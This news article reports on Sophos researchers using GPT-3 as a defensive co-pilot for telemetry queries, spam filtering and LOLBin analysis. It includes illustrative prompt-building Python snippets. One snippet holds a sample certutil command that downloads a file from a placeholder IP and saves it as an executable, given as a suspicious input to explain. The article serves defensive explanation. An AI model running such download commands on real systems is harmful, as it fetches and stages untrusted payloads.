Key highlights
- Researchers have shown how ChatGPT can be a cybersecurity tool.
- Amid concerns that the AI tool could lead to a surge in cyber threats, researchers say the same tool can be used to fight threats.
- The experts said the AI model can more easily filter malicious activity, improve spam filters, and simplify the analysis of “living off the land” binaries (LOLBins).
Researchers at Sophos, a global cybersecurity company, have demonstrated how the cybersecurity industry can leverage GPT-3, the language model behind the now well-known ChatGPT, as a co-pilot to help defeat cyber attackers.
This comes amid concerns that the AI tool could expose businesses to more security threats.
In a report titled “Applying AI Language Processing to Cyber Defenses,” the researchers said they developed projects using GPT-3’s large language models to simplify the search for malicious activity in datasets from security software, filter spam more accurately, and speed up analysis of “living off the land” binary (LOLBin) attacks.
Potential risks and opportunities in GPT-3: While noting that most attention has been on the potential security risks of the AI tool, Principal Threat Researcher at Sophos, Sean Gallagher, said:
- “Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring. Can AI help wannabe attackers write malware or help cybercriminals write much more convincing phishing emails? Perhaps, but, at Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different.
- “The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings,” said Sophos X-Ops researchers, including SophosAI Principal Data Scientist Younghoo Lee, who has been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders. All three use a technique called “few-shot learning” to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.”
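The few-shot technique described above can be sketched in a few lines: a handful of labelled samples are packed directly into the prompt, and the model is asked to label a new item. The prompt layout, the `build_few_shot_prompt` helper, and the spam/ham labels below are illustrative assumptions, not Sophos' actual implementation; in practice the finished prompt would be sent to a GPT-3 completion endpoint.

```python
# Minimal sketch of few-shot prompting for classification with a
# GPT-3 style model. Prompt layout and labels are illustrative
# assumptions, not Sophos' actual code.

def build_few_shot_prompt(examples, item):
    """Pack a handful of labelled samples into the prompt, then ask the
    model to label a new message."""
    lines = ["Classify each message as 'spam' or 'ham'.", ""]
    for text, label in examples:
        lines += [f"Message: {text}", f"Label: {label}", ""]
    lines += [f"Message: {item}", "Label:"]
    return "\n".join(lines)

# A few pre-classified samples stand in for a large training corpus --
# the point of few-shot learning.
samples = [
    ("You have won a free prize, click here!", "spam"),
    ("Meeting moved to 3pm, see updated invite.", "ham"),
]
prompt = build_few_shot_prompt(samples, "Claim your reward now!!!")
# The prompt would be sent to a completion endpoint, and the returned
# token ('spam' or 'ham') used as the verdict.
```

Because the examples travel inside the prompt, swapping in a different classification task only requires a different handful of samples, with no retraining.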
The first test: The researchers said the first application they tested with the few-shot learning method was a natural language query interface for sifting through malicious activity in security software telemetry. Specifically, they tested the model against Sophos’ endpoint detection and response product.
- “With this interface, defenders can filter through the telemetry with basic English commands, removing the need for defenders to understand SQL or a database’s underlying structure.”
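Such a natural-language query interface can be approximated as a few-shot translation prompt: a couple of English-question-to-SQL pairs prime the model, which is then asked to translate the analyst's new question. The table names, columns, and example pairs below are hypothetical; the real prototype targets Sophos' EDR telemetry schema.

```python
# Hedged sketch of a natural-language query interface over security
# telemetry. Table and column names are invented for illustration.

FEW_SHOT_PAIRS = [
    ("show all powershell executions in the last day",
     "SELECT * FROM process_events WHERE name = 'powershell.exe' "
     "AND ts > NOW() - INTERVAL '1 day'"),
    ("list hosts that contacted 10.0.0.5",
     "SELECT DISTINCT host FROM net_events WHERE dest_ip = '10.0.0.5'"),
]

def build_query_prompt(question):
    """Ask the model to emit SQL for an analyst's plain-English question,
    primed by a few example translations."""
    parts = ["Translate the question into SQL over the telemetry tables.", ""]
    for q, sql in FEW_SHOT_PAIRS:
        parts += [f"Q: {q}", f"SQL: {sql}", ""]
    parts += [f"Q: {question}", "SQL:"]
    return "\n".join(parts)

prompt = build_query_prompt("which hosts ran certutil yesterday")
# The model's completion would be the SQL statement to run against
# the telemetry store.
```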
Next, Sophos tested a new spam filter using GPT-3 and found that, when compared to other machine learning models for spam filtering, the GPT-3-based filter was significantly more accurate.
- “Finally, Sophos researchers were able to create a program to simplify the process for reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins’ behaviour—and putting a stop to those types of attacks in the future.
- “We’ve proved that, with something like GPT-3, we can simplify certain labour-intensive processes and give back valuable time to defenders. We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments. In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts,” said Gallagher.
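The LOLBin analysis described above amounts to prompting the model to translate an opaque command line into plain English. A minimal sketch, assuming a hypothetical prompt format (Sophos' actual tooling is published on its GitHub):

```python
# Illustrative sketch of prompting a GPT-3 style model to explain a
# suspicious LOLBin command line. The prompt wording and sample command
# are assumptions for illustration only.

def build_lolbin_prompt(command_line):
    """Ask the model to describe, step by step, what a living-off-the-land
    command line does and to flag suspicious behaviour."""
    return (
        "Explain what the following Windows command line does, step by "
        "step, and flag any suspicious behaviour.\n\n"
        f"Command: {command_line}\n\nExplanation:"
    )

# certutil is a classic LOLBin: a legitimate certificate utility that
# attackers abuse to download payloads.
suspicious = "certutil.exe -urlcache -split -f http://203.0.113.7/a.txt a.exe"
prompt = build_lolbin_prompt(suspicious)
# The completion would be a plain-English walkthrough an analyst can
# review far faster than reverse-engineering the flags by hand.
```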
The backstory: Many cybersecurity experts have expressed concerns that ChatGPT could be abused by hackers with limited resources and zero technical knowledge. Just weeks after ChatGPT debuted, Israeli cybersecurity company Check Point demonstrated how the web-based chatbot, when used in tandem with OpenAI’s code-writing system Codex, could create a phishing email capable of carrying a malicious payload.
However, Sophos researchers are pointing to the positive side of the AI tool, showing that it can even be used to tackle cybersecurity issues.